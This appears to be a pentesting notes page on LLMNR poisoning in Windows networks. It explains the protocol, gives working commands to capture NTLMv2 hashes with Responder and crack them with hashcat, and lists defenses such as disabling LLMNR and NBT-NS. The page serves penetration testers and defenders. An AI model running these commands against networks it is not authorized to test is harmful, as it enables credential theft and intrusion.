# LLMNR Poisoning

## What is LLMNR?

{% hint style="info" %}
**LLMNR (Link-Local Multicast Name Resolution)** is a descentralized application protocol similar to DNS that allows to resolve hostnames in the same **local network**, which means that its packets are not forwarded by routers and are only transmited in their network segment.
{% endhint %}

It is included in Windows since Windows Vista, and is the third preferred method to resolve names. The order of preference is the following:

1. DNS
2. mDNS
3. **LLMNR**
4. NBNS

In a Windows network, the computers are listening into the port `5355/UDP` and to resolve a name, the client sends a LLMNR query to the multicast address `224.0.0.252` in IPv4 (`FF02:0:0:0:0:0:1:3` in IPv6). The queries follow the DNS format and can be use to ask not only for names, but also any other question supported by DNS.

## What is LLMNR Poisoning?

The common case is use LLMNR to resolve names in local link by sending A DNS queries. In this case, the computer that has the queried name should response. **But, of course, the query can be responded by anyone, even by an attacker to perform a MITM attack.**

{% hint style="warning" %}
The key flaw is that the services utilize a user's username and **NTLMv2 password hash** when appropriately responded to.&#x20;
{% endhint %}

An attack can use [Responder](https://github.com/lgandx/Responder) to recollect NTLM hashes in networks with Windows machines:

![LLMNR Poisoning](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWVjG_njKgBtvmnKaJh%2Fuploads%2FVKVtkh1AgXYIcBoI7V4X%2Fimage.png?alt=media\&token=5d36b025-af42-44a8-90c5-37758419fae3)

{% hint style="info" %}
The **very first step** of an AD pentest is spawning a Responder listener.
{% endhint %}

## Exploitation

#### Step 1: Run Responder

{% embed url="<https://github.com/lgandx/Responder>" %}
Responder
{% endembed %}

Responder spawns a MITM listener:

```shell
responder -I tun0 -dw
```

#### Step 2: Wait for an Event

We have to wait for an user to enter a wrong address so that DNS error is triggered.

#### Step 3: Get Hashes

Once a DNS error is triggered, we will get a username-hash pair in Responder.

#### Step 4: Crack Hashes

Since Hashcat utilizes GPU instead of CPU (which John the Ripper uses), we crack the hashes on Windows host machine, not Kali virtual machine:

```shell
hashcat -m 5600 hashes.txt rockyou.txt -O -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule --hwmon-disable
```

Notes:

* Install CUDA SDK first
* The hash type is NetNTLMv2 -> 5600
* OneRuleToRuleThemAll: <https://github.com/NotSoSecure/password\\_cracking\\_rules>

## Defense

* **The best defense in this case is to disable LLMNR and NBT-NS.**
  * To disable LLMNR, select "Turn Off Multicast Name Resolution" under "Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client" in the "Group Policy Editor".
  * To disable NBT-NS, navigate to "Network Connections -> Network Adapter Properties -> TCP/IPv4 Properties -> Advanced -> WINS" and select "Disable NetBIOS over TCP/IP".
* If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
  * **Require Network Access Control**
  * **Require strong user password** (e.g., > 14 characters in length and limit common word usage). The more complex and long the password, the harder it is for an attacker to crack the hash.